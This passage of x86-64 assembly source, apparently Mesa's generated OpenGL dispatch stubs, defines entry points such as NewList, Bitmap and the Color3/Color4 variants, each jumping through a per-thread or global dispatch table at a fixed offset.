* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/* If we build with gcc's -fvisibility=hidden flag, we'll need to change
* the symbol visibility mode to 'default'.
*/
#include "../x86/assyntax.h"
#if defined(__GNUC__) && (__GNUC__ * 100 + __GNUC_MINOR__) >= 303
# pragma GCC visibility push(default)
# define HIDDEN(x) .hidden x
#else
# define HIDDEN(x)
#endif
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n) GLNAME(CONCAT(mgl,n))
# define _glapi_Dispatch _mglapi_Dispatch
# else
# define GL_PREFIX(n) GLNAME(CONCAT(gl,n))
# endif
#if defined(PTHREADS) || defined(USE_XTHREADS) || defined(SOLARIS_THREADS) || defined(WIN32_THREADS) || defined(BEOS_THREADS)
# define THREADS
#endif
.text
#ifdef GLX_USE_TLS
.globl _x86_64_get_get_dispatch; HIDDEN(_x86_64_get_get_dispatch)
_x86_64_get_get_dispatch:
lea _x86_64_get_dispatch(%rip), %rax
ret
.p2align 4,,15
_x86_64_get_dispatch:
movq _glapi_tls_Dispatch@GOTTPOFF(%rip), %rax
movq %fs:(%rax), %rax
ret
.size _x86_64_get_dispatch, .-_x86_64_get_dispatch
#elif defined(PTHREADS)
.extern _glapi_Dispatch
.extern _gl_DispatchTSD
.extern pthread_getspecific
.p2align 4,,15
_x86_64_get_dispatch:
movq _gl_DispatchTSD(%rip), %rdi
jmp pthread_getspecific@PLT
#elif defined(THREADS)
.extern _glapi_get_dispatch
#endif
.p2align 4,,15
.globl GL_PREFIX(NewList)
.type GL_PREFIX(NewList), @function
GL_PREFIX(NewList):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 0(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq (%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 0(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 0(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(NewList), .-GL_PREFIX(NewList)
.p2align 4,,15
.globl GL_PREFIX(EndList)
.type GL_PREFIX(EndList), @function
GL_PREFIX(EndList):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 8(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 8(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 8(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 8(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EndList), .-GL_PREFIX(EndList)
.p2align 4,,15
.globl GL_PREFIX(CallList)
.type GL_PREFIX(CallList), @function
GL_PREFIX(CallList):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 16(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 16(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 16(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 16(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CallList), .-GL_PREFIX(CallList)
.p2align 4,,15
.globl GL_PREFIX(CallLists)
.type GL_PREFIX(CallLists), @function
GL_PREFIX(CallLists):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 24(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 24(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 24(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 24(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CallLists), .-GL_PREFIX(CallLists)
.p2align 4,,15
.globl GL_PREFIX(DeleteLists)
.type GL_PREFIX(DeleteLists), @function
GL_PREFIX(DeleteLists):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 32(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 32(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 32(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 32(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteLists), .-GL_PREFIX(DeleteLists)
.p2align 4,,15
.globl GL_PREFIX(GenLists)
.type GL_PREFIX(GenLists), @function
GL_PREFIX(GenLists):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 40(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 40(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 40(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 40(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenLists), .-GL_PREFIX(GenLists)
.p2align 4,,15
.globl GL_PREFIX(ListBase)
.type GL_PREFIX(ListBase), @function
GL_PREFIX(ListBase):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 48(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 48(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 48(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 48(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ListBase), .-GL_PREFIX(ListBase)
.p2align 4,,15
.globl GL_PREFIX(Begin)
.type GL_PREFIX(Begin), @function
GL_PREFIX(Begin):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 56(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 56(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 56(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 56(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Begin), .-GL_PREFIX(Begin)
.p2align 4,,15
.globl GL_PREFIX(Bitmap)
.type GL_PREFIX(Bitmap), @function
GL_PREFIX(Bitmap):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 64(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
movq %rdx, 48(%rsp)
call _x86_64_get_dispatch@PLT
movq 48(%rsp), %rdx
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 64(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 64(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
movq %rdx, 48(%rsp)
call _glapi_get_dispatch
movq 48(%rsp), %rdx
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 64(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Bitmap), .-GL_PREFIX(Bitmap)
.p2align 4,,15
.globl GL_PREFIX(Color3b)
.type GL_PREFIX(Color3b), @function
GL_PREFIX(Color3b):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 72(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 72(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 72(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 72(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3b), .-GL_PREFIX(Color3b)
.p2align 4,,15
.globl GL_PREFIX(Color3bv)
.type GL_PREFIX(Color3bv), @function
GL_PREFIX(Color3bv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 80(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 80(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 80(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 80(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3bv), .-GL_PREFIX(Color3bv)
.p2align 4,,15
.globl GL_PREFIX(Color3d)
.type GL_PREFIX(Color3d), @function
GL_PREFIX(Color3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 88(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 88(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 88(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 88(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3d), .-GL_PREFIX(Color3d)
.p2align 4,,15
.globl GL_PREFIX(Color3dv)
.type GL_PREFIX(Color3dv), @function
GL_PREFIX(Color3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 96(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 96(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 96(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 96(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3dv), .-GL_PREFIX(Color3dv)
.p2align 4,,15
.globl GL_PREFIX(Color3f)
.type GL_PREFIX(Color3f), @function
GL_PREFIX(Color3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 104(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3f), .-GL_PREFIX(Color3f)
.p2align 4,,15
.globl GL_PREFIX(Color3fv)
.type GL_PREFIX(Color3fv), @function
GL_PREFIX(Color3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 112(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3fv), .-GL_PREFIX(Color3fv)
.p2align 4,,15
.globl GL_PREFIX(Color3i)
.type GL_PREFIX(Color3i), @function
GL_PREFIX(Color3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3i), .-GL_PREFIX(Color3i)
.p2align 4,,15
.globl GL_PREFIX(Color3iv)
.type GL_PREFIX(Color3iv), @function
GL_PREFIX(Color3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 128(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3iv), .-GL_PREFIX(Color3iv)
.p2align 4,,15
.globl GL_PREFIX(Color3s)
.type GL_PREFIX(Color3s), @function
GL_PREFIX(Color3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 136(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3s), .-GL_PREFIX(Color3s)
.p2align 4,,15
.globl GL_PREFIX(Color3sv)
.type GL_PREFIX(Color3sv), @function
GL_PREFIX(Color3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 144(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3sv), .-GL_PREFIX(Color3sv)
.p2align 4,,15
.globl GL_PREFIX(Color3ub)
.type GL_PREFIX(Color3ub), @function
GL_PREFIX(Color3ub):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3ub), .-GL_PREFIX(Color3ub)
.p2align 4,,15
.globl GL_PREFIX(Color3ubv)
.type GL_PREFIX(Color3ubv), @function
GL_PREFIX(Color3ubv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 160(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3ubv), .-GL_PREFIX(Color3ubv)
.p2align 4,,15
.globl GL_PREFIX(Color3ui)
.type GL_PREFIX(Color3ui), @function
GL_PREFIX(Color3ui):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3ui), .-GL_PREFIX(Color3ui)
.p2align 4,,15
.globl GL_PREFIX(Color3uiv)
.type GL_PREFIX(Color3uiv), @function
GL_PREFIX(Color3uiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3uiv), .-GL_PREFIX(Color3uiv)
.p2align 4,,15
.globl GL_PREFIX(Color3us)
.type GL_PREFIX(Color3us), @function
GL_PREFIX(Color3us):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3us), .-GL_PREFIX(Color3us)
.p2align 4,,15
.globl GL_PREFIX(Color3usv)
.type GL_PREFIX(Color3usv), @function
GL_PREFIX(Color3usv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 192(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color3usv), .-GL_PREFIX(Color3usv)
.p2align 4,,15
.globl GL_PREFIX(Color4b)
.type GL_PREFIX(Color4b), @function
GL_PREFIX(Color4b):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 200(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4b), .-GL_PREFIX(Color4b)
.p2align 4,,15
.globl GL_PREFIX(Color4bv)
.type GL_PREFIX(Color4bv), @function
GL_PREFIX(Color4bv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 208(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4bv), .-GL_PREFIX(Color4bv)
.p2align 4,,15
.globl GL_PREFIX(Color4d)
.type GL_PREFIX(Color4d), @function
GL_PREFIX(Color4d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 216(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4d), .-GL_PREFIX(Color4d)
.p2align 4,,15
.globl GL_PREFIX(Color4dv)
.type GL_PREFIX(Color4dv), @function
GL_PREFIX(Color4dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 224(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4dv), .-GL_PREFIX(Color4dv)
.p2align 4,,15
.globl GL_PREFIX(Color4f)
.type GL_PREFIX(Color4f), @function
GL_PREFIX(Color4f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 232(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4f), .-GL_PREFIX(Color4f)
.p2align 4,,15
.globl GL_PREFIX(Color4fv)
.type GL_PREFIX(Color4fv), @function
GL_PREFIX(Color4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 240(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4fv), .-GL_PREFIX(Color4fv)
.p2align 4,,15
.globl GL_PREFIX(Color4i)
.type GL_PREFIX(Color4i), @function
GL_PREFIX(Color4i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4i), .-GL_PREFIX(Color4i)
.p2align 4,,15
.globl GL_PREFIX(Color4iv)
.type GL_PREFIX(Color4iv), @function
GL_PREFIX(Color4iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 256(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4iv), .-GL_PREFIX(Color4iv)
.p2align 4,,15
.globl GL_PREFIX(Color4s)
.type GL_PREFIX(Color4s), @function
GL_PREFIX(Color4s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
